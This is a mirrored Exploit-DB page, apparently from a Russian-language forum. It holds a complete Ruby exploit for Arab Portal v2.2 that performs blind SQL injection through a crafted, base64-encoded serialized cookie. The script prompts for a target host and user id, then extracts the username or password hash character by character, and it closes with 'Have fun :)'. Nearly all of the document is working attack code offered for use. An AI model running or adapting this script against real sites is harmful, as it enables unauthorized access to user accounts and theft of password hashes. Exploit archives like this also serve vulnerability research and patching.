- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9394
- Проверка EDB
-
- Пройдено
- Автор
- JAFER AL ZIDJALI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-08-07
Код:
#!/usr/bin/ruby
#=============================================#
# Arab Portal v2.2 Exploit #,
# Blind SQL Injection / Authentication Bypass #
# Discovered & written by: Jafer Al-Zidjali #
# Email: [email protected] #
# Website: www.scorpionds.com #
#=============================================#
require "net/http"
require "base64"
intro=[
"+=============================================+",
"+ Arab Portal v2.2 Exploit +",
"+ Blind SQL Injection / Authentication Bypass +",
"+ Discovered & written by: Jafer Al-Zidjali +",
"+ Email: [email protected] +",
"+ Website: www.scorpionds.com +",
"+=============================================+"
]
def print_intro text
w="|"
text.each do |str|
str.scan(/./) do |c|
STDOUT.flush
if w=="|"
print "\b"+c +w
w="/"
elsif w=="/"
print "\b"+c +w
w="-"
elsif w=="-"
print "\b"+c +w
w="\\"
else
print "\b"+c +w
w="|"
end
sleep 0.05
end
print "\b "
puts ""
end
end
print_intro intro
puts "\nEnter host name (e.g. example.com):"
host=gets.chomp
puts "\nEnter script path (e.g. /arabportal/):"
path=gets.chomp
puts "\nEnter userid:"
userid=gets.chomp
puts "\nGetting cookie value..."
http = Net::HTTP.new(host, 80)
resp= http.get(path)
cookie = resp.response["set-cookie"]
len=cookie.split("; ").length
max=0
login_info=""
len.times do |count|
clen=cookie.split("; ")[count].length
if clen > max then
max=clen
login_info=cookie.split("; ")[count]
end
end
login_info=login_info.split(", ")
if login_info[0].length > login_info[1].length
login_info=login_info[0]
else
login_info=login_info[1]
end
login_info=login_info.split("=")[0]
puts "Cookie name is: "+login_info
puts "\nWhat do you want to do?"
puts "1. Get username."
puts "2. Get password hash."
opt=gets.chomp
if opt=="1"
unamelen=0
print "\nGetting username length"
20.times do |x|
stmt="#{userid}"+
"\x27\x20\x61\x6e\x64\x20\x6c"+
"\x65\x6e\x67\x74\x68\x28\x75"+
"\x73\x65\x72\x6e\x61\x6d\x65"+
"\x29\x3d#{x}\x20\x6f\x72\x20\x27\x27\x3d\x27"
shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
"\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
"\x72\x61\x62\x70\x6f\x72\x74\x61"+
"\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
"\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
stmt.length.to_s+
"\x3a\x22"+
stmt+
"\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
"\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
"\x31\x3a\x22\x61\x22\x3b\x7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
}
resp= http.get(path,header)
if resp.body =~ /action=logout/
puts "\nLength is: #{x}"
unamelen=x
break
else
print "."
STDOUT.flush
end
end
chars="abcdefghijklmnopqrstuvwxyz0123456789"
print "\nGetting username: "
unamelen.times do |z|
chars.scan(/./) do |c|
stmt="#{userid}"+
"\x27\x20\x61\x6e\x64\x20\x73"+
"\x75\x62\x73\x74\x72\x69\x6e"+
"\x67\x28\x75\x73\x65\x72\x6e"+
"\x61\x6d\x65\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27\x20\x6f\x72\x20\x27\x27\x3d\x27"
shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
"\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
"\x72\x61\x62\x70\x6f\x72\x74\x61"+
"\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
"\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
stmt.length.to_s+
"\x3a\x22"+
stmt+
"\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
"\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
"\x31\x3a\x22\x61\x22\x3b\x7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
}
print c
STDOUT.flush
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
if resp.body =~ /action=logout/
break
end
print "\b"
end
end
puts "\nHave fun :)"
elsif opt=="2"
chars="0123456789abcdef"
print "\nGetting password hash: "
32.times do |z|
chars.scan(/./) do |c|
stmt="#{userid}"+
"\x27\x20\x61\x6e\x64\x20\x73\x75"+
"\x62\x73\x74\x72\x69\x6e\x67\x28"+
"\x70\x61\x73\x73\x77\x6f\x72\x64"+
"\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27"+
"\x20\x6f\x72\x20\x27\x27\x3d\x27"
shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
"\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
"\x72\x61\x62\x70\x6f\x72\x74\x61"+
"\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
"\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
stmt.length.to_s+
"\x3a\x22"+
stmt+
"\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
"\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
"\x31\x3a\x22\x61\x22\x3b\x7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
}
print c
STDOUT.flush
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
if resp.body =~ /action=logout/
break
end
print "\b"
end
end
puts "\nHave fun :)"
end
# milw0rm.com [2009-08-07]
- Источник
- www.exploit-db.com